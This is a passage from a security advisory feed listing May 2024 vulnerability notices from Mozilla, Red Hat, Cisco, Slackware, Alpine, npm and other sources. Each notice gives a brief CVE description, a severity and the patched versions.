during page load, the prior content could have remained in view with a blank URL bar. This could have been used to obfuscate a spoofed web site.- CVE-2024-4774: Undefined behavior in ShmemCharMapHashEntry() (low)The <code>ShmemCharMapHashEntry()</code> code was susceptible to potentially undefined behavior by bypassing the move semantics for one of its data members.- CVE-2024-4775: Invalid memory access in the built-in profiler (low)An iterator stop condition was missing when handling WASM code in the built-in profiler, potentially leading to invalid memory access and undefined behavior. Note: This issue only affects the application when the profiler is running.- CVE-2024-4776: Window may remain disabled after file dialog is shown in full-screen (low)A file dialog shown while in full-screen mode could have resulted in the window remaining disabled.- CVE-2024-4777: Memory safety bugs fixed in Firefox 126, Firefox ESR 115.11, and Thunderbird 115.11 (moderate)Memory safety bugs present in Firefox 125, Firefox ESR 115.10, and Thunderbird 115.10. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.- CVE-2024-4778: Memory safety bugs fixed in Firefox 126 (moderate)Memory safety bugs present in Firefox 125. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.	https://secdb.nttzen.cloud/security-advisory/mozilla/MFSA-2024-21
14.05.2024 03:00:00	mozilla	[MFSA-2024-22] Security Vulnerabilities fixed in Firefox ESR 115.11 (high)	- CVE-2024-4367: Arbitrary JavaScript execution in PDF.js (high)A type check was missing when handling fonts in PDF.js, which would allow arbitrary JavaScript execution in the PDF.js context.- CVE-2024-4767: IndexedDB files retained in private browsing mode (moderate)If the <code>browser.privatebrowsing.autostart</code> preference is enabled, IndexedDB files were not properly deleted when the window was closed. This preference is disabled by default in Firefox.- CVE-2024-4768: Potential permissions request bypass via clickjacking (moderate)A bug in popup notifications' interaction with WebAuthn made it easier for an attacker to trick a user into granting permissions.- CVE-2024-4769: Cross-origin responses could be distinguished between script and non-script content-types (moderate)When importing resources using Web Workers, error messages would distinguish the difference between <code>application/javascript</code> responses and non-script responses. This could have been abused to learn information cross-origin.- CVE-2024-4770: Use-after-free could occur when printing to PDF (moderate)When saving a page to PDF, certain font styles could have led to a potential use-after-free crash.- CVE-2024-4777: Memory safety bugs fixed in Firefox 126, Firefox ESR 115.11, and Thunderbird 115.11 (moderate)Memory safety bugs present in Firefox 125, Firefox ESR 115.10, and Thunderbird 115.10. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.	https://secdb.nttzen.cloud/security-advisory/mozilla/MFSA-2024-22
14.05.2024 03:00:00	oraclelinux	[ELSA-2024-2779] nodejs:18 security update (important)	nodejs[1:18.20.2-2]- Removes .ps1 files- Rebase to 18.20.2- Fixes: CVE-2024-27983, CVE-2024-28182, CVE-2024-27982, CVE-2024-25629nodejs-nodemonnodejs-packaging	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-2779
14.05.2024 03:00:00	redhat	[RHSA-2024:2842] .NET 8.0 security update (important)	.NET is a managed-software framework. It implements a subset of the .NET framework APIs and several new APIs, and it includes a CLR implementation.New versions of .NET that address a security vulnerability are now available. The updated versions are .NET SDK 8.0.105 and .NET Runtime 8.0.5.Security Fix(es):* dotnet: stack buffer overrun in Double Parse (CVE-2024-30045)* dotnet: denial of service in ASP.NET Core due to deadlock in Http2OutputProducer.Stop() (CVE-2024-30046)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2842
14.05.2024 03:00:00	freebsd	[FREEBSD:8E0E8B56-11C6-11EF-9F97-A8A1599412C6] chromium -- multiple security fixes	Chrome Releases reports: This update includes 1 security fix: [339458194] High CVE-2024-4761: Out of bounds write in V8. Reported by Anonymous on 2024-05-09	https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:8E0E8B56-11C6-11EF-9F97-A8A1599412C6
14.05.2024 23:36:47	rubysec	[RUBYSEC:NOKOGIRI-R95H-9X8F-R3F7] Nokogiri updates packaged libxml2 to v2.12.7 to resolve CVE-2024-34459	## SummaryNokogiri v1.16.5 upgrades its dependency libxml2 to[2.12.7](https://gitlab.gnome.org/GNOME/libxml2/-/releases/v2.12.7) from 2.12.6.libxml2 v2.12.7 addresses CVE-2024-34459:- described at https://gitlab.gnome.org/GNOME/libxml2/-/issues/720- patched by https://gitlab.gnome.org/GNOME/libxml2/-/commit/2876ac53## ImpactThere is no impact to Nokogiri users because the issue is present onlyin libxml2's `xmllint` tool which Nokogiri does not provide or expose.## Timeline- 2024-05-13 05:57 EDT, libxml2 2.12.7 release is announced- 2024-05-13 08:30 EDT, nokogiri maintainers begin triage- 2024-05-13 10:05 EDT, nokogiri [v1.16.5 is released](https://github.com/sparklemotion/nokogiri/releases/tag/v1.16.5) and this GHSA made public	https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:NOKOGIRI-R95H-9X8F-R3F7
17.05.2024 00:15:59	alpinelinux	[ALPINE:CVE-2023-46103] intel-ucode vulnerability (medium)	[From CVE-2023-46103] Sequence of processor instructions leads to unexpected behavior in Intel(R) Core(TM) Ultra Processors may allow an authenticated user to potentially enable denial of service via local access.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2023-46103
17.05.2024 00:15:58	alpinelinux	[ALPINE:CVE-2023-45745] intel-ucode vulnerability (high)	[From CVE-2023-45745] Improper input validation in some Intel(R) TDX module software before version 1.5.05.46.698 may allow a privileged user to potentially enable escalation of privilege via local access.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2023-45745
17.05.2024 00:15:57	alpinelinux	[ALPINE:CVE-2023-45733] intel-ucode vulnerability (low)	[From CVE-2023-45733] Hardware logic contains race conditions in some Intel(R) Processors may allow an authenticated user to potentially enable partial information disclosure via local access.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2023-45733
16.05.2024 20:41:52	ubuntu	[USN-6778-1] Linux kernel vulnerabilities (medium)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6778-1
16.05.2024 20:16:03	ubuntu	[USN-6777-1] Linux kernel vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6777-1
16.05.2024 19:47:34	ubuntu	[USN-6776-1] Linux kernel vulnerabilities (medium)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6776-1
16.05.2024 18:39:35	ubuntu	[USN-6775-1] Linux kernel vulnerabilities (medium)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6775-1
16.05.2024 17:27:39	ubuntu	[USN-6774-1] Linux kernel vulnerabilities (medium)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6774-1
16.05.2024 17:15:08	alpinelinux	[ALPINE:CVE-2023-46842] xen vulnerability	[From CVE-2023-46842] Unlike 32-bit PV guests, HVM guests may switch freely between 64-bit andother modes. This in particular means that they may set registers usedto pass 32-bit-mode hypercall arguments to values outside of the range32-bit code would be able to set them to.When processing of hypercalls takes a considerable amount of time,the hypervisor may choose to invoke a hypercall continuation. Doing soinvolves putting (perhaps updated) hypercall arguments in respectiveregisters. For guests not running in 64-bit mode this further involvesa certain amount of translation of the values.Unfortunately internal sanity checking of these translated valuesassumes high halves of registers to always be clear when invoking ahypercall. When this is found not to be the case, it triggers aconsistency check in the hypervisor and causes a crash.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2023-46842
16.05.2024 17:15:08	alpinelinux	[ALPINE:CVE-2024-31142] xen vulnerability	[From CVE-2024-31142] Because of a logical error in XSA-407 (Branch Type Confusion), themitigation is not applied properly when it is intended to be used.XSA-434 (Speculative Return Stack Overflow) uses the sameinfrastructure, so is equally impacted.For more details, see: https://xenbits.xen.org/xsa/advisory-407.html https://xenbits.xen.org/xsa/advisory-434.html	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-31142
16.05.2024 16:40:01	ubuntu	[USN-6773-1] .NET vulnerabilities (medium)	Several security issues were fixed in .NET.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6773-1
16.05.2024 05:33:18	slackware	[SSA:2024-136-02] git (critical)	New git packages are available for Slackware 15.0 and -current tofix security issues.Here are the details from the Slackware 15.0 ChangeLog```patches/packages/git-2.39.4-i586-1_slack15.0.txz: Upgraded. This update fixes security issues: Recursive clones on case-insensitive filesystems that support symbolic links are susceptible to case confusion that can be exploited to execute just-cloned code during the clone operation. Repositories can be configured to execute arbitrary code during local clones. To address this, the ownership checks introduced in v2.30.3 are now extended to cover cloning local repositories. Local clones may end up hardlinking files into the target repository's object database when source and target repository reside on the same disk. If the source repository is owned by a different user, then those hardlinked files may be rewritten at any point in time by the untrusted user. When cloning a local source repository that contains symlinks via the filesystem, Git may create hardlinks to arbitrary user-readable files on the same filesystem as the target repository in the objects/ directory. It is supposed to be safe to clone untrusted repositories, even those unpacked from zip archives or tarballs originating from untrusted sources, but Git can be tricked to run arbitrary code as part of the clone. For more information, see: https://www.cve.org/CVERecord?id=CVE-2024-32002 https://www.cve.org/CVERecord?id=CVE-2024-32004 https://www.cve.org/CVERecord?id=CVE-2024-32020 https://www.cve.org/CVERecord?id=CVE-2024-32021 https://www.cve.org/CVERecord?id=CVE-2024-32465 (* Security fix )```Where to find the new packagesThanks to the friendly folks at the OSU Open Source Lab(http://osuosl.org) for donating FTP and rsync hostingto the Slackware project! :-)Also see the "Get Slack" section on http://slackware.com foradditional mirror sites near you.Updated package for Slackware 15.0:ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/git-2.39.4-i586-1_slack15.0.txzUpdated package for Slackware x86_64 15.0:ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/git-2.39.4-x86_64-1_slack15.0.txzUpdated package for Slackware -current:ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/d/git-2.45.1-i586-1.txzUpdated package for Slackware x86_64 -current:ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/d/git-2.45.1-x86_64-1.txzMD5 signaturesSlackware 15.0 package:837b659cb32a07eed09bf4de30b72741 git-2.39.4-i586-1_slack15.0.txzSlackware x86_64 15.0 package:530b3158ef258881e1a340baff5d61b5 git-2.39.4-x86_64-1_slack15.0.txzSlackware -current package:0f6950f7d7f336e7aa2d47d4a4711bc9 d/git-2.45.1-i586-1.txzSlackware x86_64 -current package:685fddae35e6b5d4366104f1c05ccd43 d/git-2.45.1-x86_64-1.txzInstallation instructions*Upgrade the package as root:`# upgradepkg git-2.39.4-i586-1_slack15.0.txz`	https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-136-02
16.05.2024 05:32:59	slackware	[SSA:2024-136-01] gdk-pixbuf2 (high)	New gdk-pixbuf2 packages are available for Slackware 15.0 and -current tofix a security issue.Here are the details from the Slackware 15.0 ChangeLog```patches/packages/gdk-pixbuf2-2.42.12-i586-1_slack15.0.txz: Upgraded. ani: Reject files with multiple INA or IART chunks. ani: Reject files with multiple anih chunks. ani: validate chunk size. Thanks to 0xvhp, pedrib, and Benjamin Gilbert. For more information, see: https://www.cve.org/CVERecord?id=CVE-2022-48622 (* Security fix )```Where to find the new packagesThanks to the friendly folks at the OSU Open Source Lab(http://osuosl.org) for donating FTP and rsync hostingto the Slackware project! :-)Also see the "Get Slack" section on http://slackware.com foradditional mirror sites near you.Updated package for Slackware 15.0:ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/gdk-pixbuf2-2.42.12-i586-1_slack15.0.txzUpdated package for Slackware x86_64 15.0:ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/gdk-pixbuf2-2.42.12-x86_64-1_slack15.0.txzUpdated package for Slackware -current:ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/gdk-pixbuf2-2.42.12-i586-1.txzUpdated package for Slackware x86_64 -current:ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/gdk-pixbuf2-2.42.12-x86_64-1.txzMD5 signaturesSlackware 15.0 package:b4be8911d6f57b20a18d0dd5ce4ac42a gdk-pixbuf2-2.42.12-i586-1_slack15.0.txzSlackware x86_64 15.0 package:5abbb8e210dd3567b105cb78f4f78552 gdk-pixbuf2-2.42.12-x86_64-1_slack15.0.txzSlackware -current package:f4b995edbc7e21a1b2d837284aefb004 l/gdk-pixbuf2-2.42.12-i586-1.txzSlackware x86_64 -current package:6e8c1d8a5aca9bb2f5967d8a5d15def4 l/gdk-pixbuf2-2.42.12-x86_64-1.txzInstallation instructions*Upgrade the package as root:`# upgradepkg gdk-pixbuf2-2.42.12-i586-1_slack15.0.txz`	https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-136-01
16.05.2024 03:00:00	cisa	[CISA-2024:0516] CISA Adds 3 Known Exploited Vulnerabilities to Catalog (high)	CISA has added 3 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.	https://secdb.nttzen.cloud/security-advisory/cisa/CISA-2024:0516
16.05.2024 03:00:00	oraclelinux	[ELSA-2024-2853] nodejs:20 security update (important)	nodejs[1:20.12.2-2]- Backport nghttp2 patch for CVE-2024-28182[1:20.12.2-1]- Rebase to version 20.12.0 Fixes: CVE-2024-27983 CVE-2024-27982 CVE-2024-22025 (node) Fixes: CVE-2024-25629 (c-ares)nodejs-nodemonnodejs-packaging	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-2853
16.05.2024 03:00:00	oraclelinux	[ELSA-2024-2881] firefox security update (important)	[115.11.0-1.0.1]- Remove upstream references [Orabug: 30143292]- Update distribution for Oracle Linux [Orabug: 30143292]- Add firefox-oracle-default-prefs.js and remove the corresponding Red Hat file[115.11.0-1]- Update to 115.11.0 build1	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-2881
16.05.2024 23:19:21	rubysec	[RUBYSEC:REXML-2024-35176] REXML contains a denial of service vulnerability (medium)	### ImpactThe REXML gem before 3.2.6 has a DoS vulnerability when itparses an XML that has many `<`s in an attribute value.If you need to parse untrusted XMLs, you many be impactedto this vulnerability.### PatchesThe REXML gem 3.2.7 or later include the patch to fix thisvulnerability.### WorkaroundsDon't parse untrusted XMLs.### References* https://www.ruby-lang.org/en/news/2024/05/16/dos-rexml-cve-2024-35176/	https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:REXML-2024-35176
16.05.2024 03:00:00	redhat	[RHSA-2024:2881] firefox security update (important)	Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability.This update upgrades Firefox to version 115.11.0 ESR.Security Fix(es):* firefox: Arbitrary JavaScript execution in PDF.js (CVE-2024-4367)* firefox: IndexedDB files retained in private browsing mode (CVE-2024-4767)* firefox: Potential permissions request bypass via clickjacking (CVE-2024-4768)* firefox: Cross-origin responses could be distinguished between script andnon-script content-types (CVE-2024-4769)* firefox: Use-after-free could occur when printing to PDF (CVE-2024-4770)* firefox: Memory safety bugs fixed in Firefox 126, Firefox ESR 115.11, andThunderbird 115.11 (CVE-2024-4777)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2881
16.05.2024 03:00:00	redhat	[RHSA-2024:2883] firefox security update (important)	Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability.This update upgrades Firefox to version 115.11.0 ESR.Security Fix(es): * firefox: Arbitrary JavaScript execution in PDF.js (CVE-2024-4367)* firefox: IndexedDB files retained in private browsing mode (CVE-2024-4767)* firefox: Potential permissions request bypass via clickjacking (CVE-2024-4768)* firefox: Cross-origin responses could be distinguished between script and non-script content-types (CVE-2024-4769)* firefox: Use-after-free could occur when printing to PDF (CVE-2024-4770)* firefox: Memory safety bugs fixed in Firefox 126, Firefox ESR 115.11, and Thunderbird 115.11 (CVE-2024-4777)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2883
16.05.2024 03:00:00	redhat	[RHSA-2024:2888] thunderbird security update (important)	Mozilla Thunderbird is a standalone mail and newsgroup client.This update upgrades Thunderbird to version 115.11.0.Security Fix(es):* firefox: Arbitrary JavaScript execution in PDF.js (CVE-2024-4367)* firefox: IndexedDB files retained in private browsing mode (CVE-2024-4767)* firefox: Potential permissions request bypass via clickjacking (CVE-2024-4768)* firefox: Cross-origin responses could be distinguished between script andnon-script content-types (CVE-2024-4769)* firefox: Use-after-free could occur when printing to PDF (CVE-2024-4770)* firefox: Memory safety bugs fixed in Firefox 126, Firefox ESR 115.11, andThunderbird 115.11 (CVE-2024-4777)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2888
15.05.2024 22:48:34	maven	[MAVEN:GHSA-76V2-48W6-CRXR] Bonitasoft Runtime Community edition's contains an insecure direct object references vulnerability (moderate)	In Bonitasoft runtime Community edition, the lack of dynamic permissions causes IDOR vulnerability. Dynamic permissions existed only in Subscription edition and have now been restored in Community edition, where they are not custmizable.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-76V2-48W6-CRXR
15.05.2024 20:10:52	maven	[MAVEN:GHSA-X3WM-HFFR-CHWM] Amazon JDBC Driver for Redshift SQL Injection via line comment generation (critical)	### ImpactSQL injection is possible when using the non-default connection property `preferQueryMode=simple` in combination with application code which has a vulnerable SQL that negates a parameter value.There is no vulnerability in the driver when using the default, extended query mode. Note that `preferQueryMode` is not a supported parameter in Redshift JDBC driver, and is inherited code from Postgres JDBC driver. Users who do not override default settings to utilize this unsupported query mode are not affected.### PatchThis issue is patched in driver version 2.1.0.28.### WorkaroundsDo not use the connection property `preferQueryMode=simple`. (NOTE: If you do not explicitly specify a query mode, then you are using the default of extended query mode and are not affected by this issue.)### ReferencesSimilar to finding in Postgres JDBC: https://github.com/pgjdbc/pgjdbc/security/advisories/GHSA-24rp-q3w6-vc56If you have any questions or comments about this advisory, we ask that you contact AWS Security via our [vulnerability reporting page](https://aws.amazon.com/security/vulnerability-reporting) or directly via email to [aws-security@amazon.com](mailto:aws-security@amazon.com). Please do not create a public GitHub issue.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-X3WM-HFFR-CHWM
15.05.2024 19:00:00	cisco	[CISCO-SA-NSO-RWPESC-QRQGNH3F] Cisco Crosswork Network Services Orchestrator Vulnerabilities (high)	Multiple vulnerabilities in the Cisco Crosswork Network Services Orchestrator (NSO) CLI could allow an authenticated, low-privileged, local attacker to read and write arbitrary files as root or elevate privileges to root on the underlying operating system.For more information about these vulnerabilities, see the Details ["#details"] section of this advisory.Cisco has released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities.	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-NSO-RWPESC-QRQGNH3F
15.05.2024 19:00:00	cisco	[CISCO-SA-CNFD-RWPESC-ZAOUFYX8] ConfD CLI Privilege Escalation and Arbitrary File Read and Write Vulnerabilities (high)	Multiple vulnerabilities in the ConfD CLI could allow an authenticated, low-privileged, local attacker to read and write arbitrary files as root or elevate privileges to root on the underlying operating system.For more information about these vulnerabilities, see the Details ["#details"] section of this advisory.Cisco has released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities.	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-CNFD-RWPESC-ZAOUFYX8
15.05.2024 19:00:00	cisco	[CISCO-SA-SECURE-NAM-PRIV-ESC-SZU2VYPZ] Cisco Secure Client for Windows with Network Access Manager Module Privilege Escalation Vulnerability (medium)	A vulnerability in the Network Access Manager (NAM) module of Cisco Secure Client could allow an unauthenticated attacker with physical access to an affected device to elevate privileges to SYSTEM.This vulnerability is due to a lack of authentication on a specific function. A successful exploit could allow the attacker to execute arbitrary code with SYSTEM privileges on an affected device.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-SECURE-NAM-PRIV-ESC-SZU2VYPZ
15.05.2024 19:00:00	cisco	[CISCO-SA-NSO-ORDIR-MNM8YQZO] Cisco Crosswork Network Services Orchestrator Open Redirect Vulnerability (medium)	A vulnerability in the web-based management interface of Cisco Crosswork Network Services Orchestrator (NSO) could allow an unauthenticated, remote attacker to redirect a user to a malicious web page.This vulnerability is due to improper input validation of a parameter in an HTTP request. An attacker could exploit this vulnerability by persuading a user to click a crafted link. A successful exploit could allow the attacker to redirect a user to a malicious website.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-NSO-ORDIR-MNM8YQZO
15.05.2024 19:00:00	cisco	[CISCO-SA-NSO-HCC-PRIV-ESC-OWBWCS5D] Cisco Crosswork Network Services Orchestrator Privilege Escalation Vulnerability (high)	A vulnerability in the Tail-f High Availability Cluster Communications (HCC) function pack of Cisco Crosswork Network Services Orchestrator (NSO) could allow an authenticated, local attacker to elevate privileges to root on an affected device.This vulnerability exists because a user-controlled search path is used to locate executable files. An attacker could exploit this vulnerability by configuring the application in a way that causes a malicious file to be executed. A successful exploit could allow the attacker to execute arbitrary code on an affected device as the root user. To exploit this vulnerability, the attacker would need valid credentials on an affected device.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-NSO-HCC-PRIV-ESC-OWBWCS5D
15.05.2024 19:00:00	cisco	[CISCO-SA-ESA-SMA-WSA-XSS-BGG5WHOD] Cisco Secure Email and Web Manager, Secure Email Gateway, and Secure Web Appliance Cross-Site Scripting Vulnerabilities (medium)	Multiple vulnerabilities in the web-based management interface of Cisco AsyncOS Software for Cisco Secure Email and Web Manager; Secure Email Gateway, formerly Email Security Appliance (ESA); and Secure Web Appliance could allow a remote attacker to conduct a cross-site scripting (XSS) attack against a user of the interface.For more information about these vulnerabilities, see the Details ["#details"] section of this advisory.Cisco has released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities.	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-ESA-SMA-WSA-XSS-BGG5WHOD
15.05.2024 19:00:00	cisco	[CISCO-SA-ESA-HTTP-SPLIT-GLRNNOWS] Cisco Secure Email Gateway HTTP Response Splitting Vulnerability (medium)	A vulnerability in the web-based management API of Cisco AsyncOS Software for Cisco Secure Email Gateway could allow an unauthenticated, remote attacker to conduct an HTTP response splitting attack.This vulnerability is due to insufficient input validation of some parameters that are passed to the web-based management API of the affected system. An attacker could exploit this vulnerability by persuading a user of an affected interface to click a crafted link. A successful exploit could allow the attacker to perform cross-site scripting (XSS) attacks, resulting in the execution of arbitrary script code in the browser of the targeted user, or could allow the attacker to access sensitive, browser-based information.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-ESA-HTTP-SPLIT-GLRNNOWS
15.05.2024 19:00:00	cisco	[CISCO-SA-APPD-NETVISDOS-9ZNBSJTK] Cisco AppDynamics Network Visibility Service Denial of Service Vulnerability (medium)	A vulnerability in Cisco AppDynamics Network Visibility Agent could allow an unauthenticated, local attacker to cause a denial of service (DoS) condition on an affected device.This vulnerability is due to the inability to handle unexpected input. An attacker who has local device access could exploit this vulnerability by sending an HTTP request to the targeted service. A successful exploit could allow the attacker to cause a DoS condition by stopping the Network Agent Service on the local device.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-APPD-NETVISDOS-9ZNBSJTK
15.05.2024 18:15:08	ubuntu	[USN-6766-2] Linux kernel vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6766-2
16.05.2024 10:51:11	almalinux	[ALSA-2024:2843] .NET 7.0 security update (important)	.NET 7.0 security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:2843
16.05.2024 10:49:52	almalinux	[ALSA-2024:2853] nodejs:20 security update (important)	nodejs:20 security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:2853
16.05.2024 10:52:43	almalinux	[ALSA-2024:2842] .NET 8.0 security update (important)	.NET 8.0 security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:2842
21.05.2024 00:03:14	npm	[NPM:GHSA-5F97-H2C2-826Q] json-schema-ref-parser Prototype Pollution issue (high)	A Prototype Pollution issue in API Dev Tools json-schema-ref-parser v.11.0.0 and v.11.1.0 allows a remote attacker to execute arbitrary code via the `bundle()`, `parse()`, `resolve()`, `dereference()` functions.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-5F97-H2C2-826Q
20.05.2024 23:56:15	npm	[NPM:GHSA-8VR4-H4RR-8PH6] MiguelCastillo @bit/loader Prototype Pollution issue (moderate)	A Prototype Pollution issue in MiguelCastillo @bit/loader v.10.0.3 allows an attacker to execute arbitrary code via the M function e argument in index.js.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-8VR4-H4RR-8PH6
20.05.2024 23:54:11	npm	[NPM:GHSA-G3Q2-VCJQ-RGRC] Blackprint @blackprint/engine Prototype Pollution issue (moderate)	A Prototype Pollution issue in Blackprint @blackprint/engine 0.8.12 through 0.9.1 allows an attacker to execute arbitrary code via the `_utils.setDeepProperty` function of `engine.min.js`.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-G3Q2-VCJQ-RGRC
20.05.2024 17:57:08	maven	[MAVEN:GHSA-QXQF-2MFX-X8JW] veraPDF has potential XSLT injection vulnerability when using policy files (high)	### ImpactExecuting policy checks using custom schematron files invokes an XSL transformation that may theoretically lead to a remote code execution (RCE) vulnerability.### PatchesThis has been patched and users should upgrade to veraPDF v1.24.2### WorkaroundsThis doesn't affect the standard validation and policy checks functionality, veraPDF's common use cases. Most veraPDF users don't insert any custom XSLT code into policy profiles, which are based on Schematron syntax rather than direct XSL transforms. For users who do, only load custom policy files from sources you trust.### ReferencesOriginal issue: <https://github.com/veraPDF/veraPDF-library/issues/1415>	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-QXQF-2MFX-X8JW
20.05.2024 10:23:15	almalinux	[ALSA-2024:2910] nodejs security update (important)	nodejs security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:2910
20.05.2024 03:00:00	cisa	[CISA-2024:0520] CISA Adds 2 Known Exploited Vulnerabilities to Catalog	CISA has added 2 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.	https://secdb.nttzen.cloud/security-advisory/cisa/CISA-2024:0520
20.05.2024 03:00:00	oraclelinux	[ELSA-2024-2913] thunderbird security update (important)	[115.11.0-1.0.1]- Replaced thunderbird-redhat-default-prefs.js with thunderbird-oracle-default-prefs.js- Enabled aarch64 build[115.11.0-1]- Update to 115.11.0 build2	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-2913
20.05.2024 03:00:00	redhat	[RHSA-2024:2913] thunderbird security update (important)	Mozilla Thunderbird is a standalone mail and newsgroup client.This update upgrades Thunderbird to version 115.11.0.Security Fix(es):* firefox: Arbitrary JavaScript execution in PDF.js (CVE-2024-4367)* firefox: IndexedDB files retained in private browsing mode (CVE-2024-4767)* firefox: Potential permissions request bypass via clickjacking (CVE-2024-4768)* firefox: Cross-origin responses could be distinguished between script andnon-script content-types (CVE-2024-4769)* firefox: Use-after-free could occur when printing to PDF (CVE-2024-4770)* firefox: Memory safety bugs fixed in Firefox 126, Firefox ESR 115.11, andThunderbird 115.11 (CVE-2024-4777)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2913
20.05.2024 03:00:00	redhat	[RHSA-2024:2910] nodejs security update (important)	Node.js is a software development platform for building fast and scalable network applications in the JavaScript programming language. Security Fix(es):* nodejs: CONTINUATION frames DoS (CVE-2024-27983)* nodejs: using the fetch() function to retrieve content from an untrusted URL leads to denial of service (CVE-2024-22025)* nodejs: HTTP Request Smuggling via Content Length Obfuscation (CVE-2024-27982)* nghttp2: CONTINUATION frames DoS (CVE-2024-28182)* c-ares: Out of bounds read in ares__read_line() (CVE-2024-25629)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2910
17.05.2024 23:06:00	go	[GO-2024-2748] Privilege Escalation in Kubernetes in k8s.io/apimachinery	The Kubernetes kube-apiserver is vulnerable to an unvalidated redirect onproxied upgrade requests that could allow an attacker to escalate privilegesfrom a node compromise to a full cluster compromise.	https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2748
17.05.2024 22:48:16	go	[GO-2024-2632] JWX vulnerable to a denial of service attack using compressed JWE message ingithub.com/lestrrat-go/jwx	An attacker with a trusted public key may cause a Denial-of-Service (DoS)condition by crafting a malicious JSON Web Encryption (JWE) token with anexceptionally high compression ratio. When this token is processed by therecipient, it results in significant memory allocation and processing timeduring decompression.	https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2632
